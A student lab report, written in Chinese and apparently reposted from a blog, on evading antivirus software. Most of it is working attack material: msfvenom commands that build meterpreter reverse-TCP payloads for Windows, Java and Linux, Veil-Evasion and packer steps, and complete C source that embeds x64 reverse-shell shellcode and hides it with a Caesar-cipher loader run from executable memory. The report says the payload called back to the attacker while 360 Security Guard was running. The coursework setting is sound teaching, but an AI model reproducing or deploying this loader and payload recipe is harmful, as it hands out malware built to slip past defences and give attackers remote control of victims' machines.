20222323 2024-2025-1 《网络与系统攻防技术》实验三实验报告

标签：exe x41 x89 xff x48 2024 2025 20222323 x00

1.实验内容

1.1实践目标

(1)正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧
正确使用msf编码器，使用msfvenom生成如jar之类的其他文件
veil，加壳工具
使用C + shellcode编程
(2)通过组合应用各种技术实现恶意代码免杀
(3)用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

1.2回答问题

（1）杀软是如何检测出恶意代码的？
基于特征码的检测：杀毒软件会维护一个病毒特征码库，其中记录了已知恶意代码的特征码。当杀毒软件扫描文件或系统时，它会将扫描到的信息与病毒特征码库进行比对。如果找到匹配的特征码，杀毒软件就会判断该文件或系统被恶意代码感染。
启发式恶意软件检测：通过分析软件的行为、代码结构、签名等特征来推断其是否为恶意代码。如果一个软件的行为或特征与恶意代码相似，或者存在异常，启发式恶意软件检测就会将其视为潜在威胁。
基于行为的恶意软件检测：对运行中的所有进程进行实时监控，观察其行为模式。如果某个进程表现出敏感行为，如连接恶意网站、开放端口、修改系统文件等，基于行为的恶意软件检测就会将其识别为恶意程序。

（2）免杀是做什么？
全称为反杀毒技术，是一种能使病毒木马免于被杀毒软件查杀的技术。免杀技术主要是通过修改病毒、木马的内容或特征码，使其能够躲避杀毒软件的查杀。免杀技术在计算机安全领域具有广泛的应用，尤其是在黑客攻击、间谍软件和病毒等恶意行为中。

（3）免杀的基本方法有哪些？
静态免杀方法：
修改特征码：通过修改病毒文件的特征码来避免被杀毒软件识别。
代码混淆：通过修改源代码或二进制代码，使病毒文件的代码结构变得难以理解，从而增加杀毒软件的分析难度。
加壳：对病毒文件进行加壳处理，可以隐藏程序的入口文件，使杀毒软件无法找到程序的正常入口。

动态免杀方法：
  利用白名单：将病毒文件伪装成正常的软件或文件，使其能够躲避杀毒软件的检测。
  伪装成系统文件：将病毒文件放置在系统目录中，并修改其名称和属性，使其看起来像是系统文件。
  定期更新：由于杀毒软件会不断更新其病毒特征码库和检测算法，因此病毒也需要不断更新以躲避杀毒软件的检测。

2.实验过程

一、使用msfvenom生成如jar之类的其他文件

查看 msfvenom 支持的所有输出格式：输入msfvenom --list formats：

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.54.32 LPORT=2323 -f exe > 20222323dxh.exe，生成payload；

输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.54.32 LPORT=2323 -f exe > 20222323dxh-2.exe对payload进行编码

多次编码：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.54.32 LPORT=2323 -f exe > 20222323dxh-3.exe；

选择一个适用于Java环境的payload来生成jar文件：msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.54.32 LPORT=2323 -f jar > 20222323dxh-4.jar；

使用编码器对此jar进行编码：msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.54.32 LPORT=2323 -e x86/shikata_ga_nai -i 10 -f jar > 20222323dxh-5.jar；

生成一个反向 TCP 连接的 Linux elf 可执行文件：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.54.32 LPORT=2323 -f elf > 20222323dxh-6.elf

使用编码器对此elf可执行文件进行编码：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.54.32 LPORT=2323 -e x86/shikata_ga_nai -i 10 -f elf > 20222323dxh-7.elf

将生成的这七个文件放到主机中：

打开VirusTotal，放入这些文件开始检测：

二、使用veil

连网状态下依次输入以下命令：

mkdir -p ~/.cache/wine

cd ~/.cache/wine

wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi

wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

sudo apt-get install libncurses5*

sudo apt-get install libavutil55*

sudo apt-get install gcc-mingw-w64*

sudo apt-get install wine32

再依次输入：

apt-get install veil

cd /usr/share/veil/config/

vim setup.sh

在获取下载链接这一行中（200+行左右），把下载地址换成https://gitee.com/spears/VeilDependencies.git，:wq保存退出

运行veil进行安装：

安装完成后输入veil，进入veil说明安装成功

输入use evasion ，进入Evil—Evasion；

使用c/meterpretermrev_tcp.py，即7号，所以输入use 7；

set LHOST 192.168.1.123 设置反弹链接ip，此处为Kali的ip

set LPORT 2323 设置端口

generate

输入生成的文件名称：20222323_veil；

输入cd /var/lib/veil/output/compiled/，进入文件夹，输入ls查看生成的.exe可执行文件；

将此程序传到主机：

同样，使用VirusTotal进行检测：

三、加壳

upx加壳：输入upx 20222323.exe -o upx20222323.exe；

hyperion加壳：

输入cp upx20222323.exe /usr/share/windows-resources/hyperion；

输入cd /usr/share/windows-resources/hyperion进入文件夹；

输入ls查看生成的可执行文件；

输入wine hyperion.exe -v upx20222323.exe upx20222323dxh.exe

将这俩可执行文件放进主机，在VirusTotal中进行检测：

四、使用C + shellcode编程

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=2323 -f c

新建20222323.c文件，并进行编辑；

将使用msfvenom生成的buf[]数组复制粘贴到打开的文件中，并补全主函数，代码如下：

:wq保存退出，输入i686-w64-mingw32-g++ 20222323.c -o 20222323.exe：

将此文件传入主机，在VirusTotal中进行检测：

五、通过组合应用各种技术实现恶意代码免杀

组合技术：msfvenom生成Shellcode数组，再使用凯撒加密对数组进行加密，将加密后的密文放入txt文件中，再编写C语言代码，从txt文件中读取密文，解密并运行Shellcode，最后生成.exe可执行文件。

虚拟机中通过msfvenom生成Shellcode数组：代码如下msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=10086 -f c；

将buf[]中的内容复制；

使用codeblocks，新建20222323_jiami.c（cpp）文件，输入代码，代码功能为将复制内容放入shellcode1[]数组中，通过代码将shellcode1进行凯撒加密，将密文输入到2323jiami.txt文件中；

新建空文件2323jiami.txt，用以存放密文；

代码如下：

``#include <stdio.h>

``#include<string.h>

//凯撒加密函数，适用于unsigned char数组

void caesarEncrypt(unsigned char *data, size_t length, int shift) {

for (size_t i = 0; i < length; i++) {

// 对每个字节进行位移

data[i]= (data[i] + shift) & 0xFF;

}

}

int main( ) {

unsigned char shellcode1[] ="\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"

"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"

"\x18\x48\x8b\x52\x20\x4d\x31\xc9\x48\x8b\x72\x50\x48\x0f"

"\xb7\x4a\x4a\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"

"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b"

"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x41\x51\x0f"

"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"

"\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x50\x8b\x48\x18\x49"

"\x01\xd0\xe3\x56\x48\xff\xc9\x4d\x31\xc9\x41\x8b\x34\x88"

"\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1"

"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"

"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"

"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"

"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"

"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"

"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"

"\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"

"\x89\xe5\x49\xbc\x02\x00\x27\x66\xc0\xa8\x4c\x80\x41\x54"

"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"

"\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"

"\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"

"\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"

"\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"

"\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"

"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"

"\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"

"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"

"\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"

"\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"

"\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"

"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"

"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"

"\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"

"\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"

"\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"

"\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"

"\xf0\xb5\xa2\x56\xff\xd5";

int shift =3; // 加密位移

printf("original: ");

for (size_t i = 0; i < 510; i++) {

printf("\x%02x",shellcode1[i]);

}

printf("\n");

caesarEncrypt(shellcode1,510,shift);

printf("Encrypted:");

for (size_t i =0;i< 510; i++){

printf("\x%02x",shellcode1[i]);

}

printf("\n");

FILE *file = fopen("2323jiami.txt", "w");

if (file != NULL) {

    for (size_t i = 0; i < 510; i++) {

        fprintf(file, "\\x%02x", shellcode1[i]);

    }

    fprintf(file, "\n");

    fclose(file);

} else {

    printf("Error opening file!\n");

}

return 0;

}

编辑并运行该文件；

新建20222323_jiemi.cpp文件，输入代码，代码功能为读取2323jiami.txt文件中的内容到shellcode1[]数组中，并进行解密，再运行shellcode；

代码如下：

``#include <windows.h>

``#include <stdio.h>

``#include <stdlib.h>

``#include <string.h>

// 凯撒解密函数，适用于unsigned char数组

void caesarDecrypt(unsigned char *data, size_t length, int shift) {

for (size_t i = 0; i < length; i++) {

    // 对每个字节进行位移

    data[i] = (unsigned char)((data[i] - shift + 256) % 256);

}

}

int main() {

int shift = 3; // 凯撒加密的位移值

unsigned char shellcode1[511]; // 假设文件中的内容不超过510字节

char line[1024]; // 用于读取文件的临时缓冲区



// 打开文件

FILE *file = fopen("2323jiami.txt", "r");

if (file == NULL) {

    perror("Error opening file");

    return 1;

}



// 读取文件内容到shellcode1数组中

size_t length = 0;

while (fgets(line, sizeof(line), file)) {

    // 将读取的十六进制字符串转换为字节并存储在shellcode1中

    for (size_t i = 0; line[i] != '\0' && line[i] != '\n'; i += 1) {

        if (sscanf(&line[i], "\\x%02hhx", &shellcode1[length]) == 1) {

            length++;

        }

    }

}

fclose(file);



// 解密shellcode

caesarDecrypt(shellcode1, length, shift);



// 输出解密后的shellcode

/*printf("Decrypted Shellcode:\n");

for (size_t i = 0; i < 510; i++) {

    printf("\\x%02x", shellcode1[i]);

}

printf("\n");*/



// 分配内存并设置为可执行

LPVOID exec = VirtualAlloc(0, sizeof shellcode1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);



// 将解密后的shellcode复制到分配的内存中

memcpy(exec, shellcode1, sizeof shellcode1);

// 执行shellcode

((void(*)())exec)();



return 0;

}

编译该文件，可以看到20222323_jiemi.exe已生成：

六、用电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本。

先配置监听模块：
依次输入以下命令：

use exploit/multi/handler 使用监听模块，设置payload

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.1.118

set LPORT 10086

run

主机中运行20222323_jiemi.exe文件，返回虚拟机，输入sysinfo，查看版本

可以查看到win10版本，说明回连并攻击成功。
电脑的杀软名称与版本：360安全卫士极速版，15.0.2.1009

3.问题及解决方案

• 问题1：veil反复安装失败

• 问题1解决方案：玄学安装，相同操作却能成功，解决办法就是多次安装。

• 问题2：veil安装过程中虚拟机崩溃

• 问题2解决方案：开机时进入命令行界面，依次输入apt-get clean；apt-get autoclean；apt-get autoremove；然后重启，如果还是不行只能选择重装。

• 问题3：c++编译完没有生成.exe程序

• 问题3解决方案：codeblocks中编译完.exe程序不会直接出现在子目录中，而是出现在/bin目录中

4.学习感悟、思考等

在深入学习并实践了msf编码器、veil-evasion、shellcode编程等免杀工具与技巧后，我对于网络安全领域的攻防对抗有了更为深刻的认识。这些工具和技术不仅仅是简单的“绕过”杀软的手段，更是对网络安全防护体系的一次深度剖析和挑战。

在组合应用各种技术实现恶意代码免杀的过程中，我深刻体会到了技术的多样性和复杂性。每一种技术都有其独特的优势和局限性，而如何将这些技术巧妙地融合在一起，形成一套完整的免杀方案，是我不断追求的目标。

实测环节更是让我感受到了网络安全实战的紧张与刺激。在另一台电脑上，面对不同品牌和版本的杀软，我不断调整和优化我的恶意代码，最终实现了在杀软开启的情况下成功运行并回连。这一成果不仅让我倍感自豪，也让我更加坚定了在网络安全领域不断学习和探索的决心。

总之，这次学习经历让我收获颇丰，不仅提升了我的技术水平，更让我对网络安全有了更为全面和深入的理解。

标签：exe,x41,x89,xff,x48,2024,2025,20222323,x00
From： https://www.cnblogs.com/dxh1459110526/p/18487687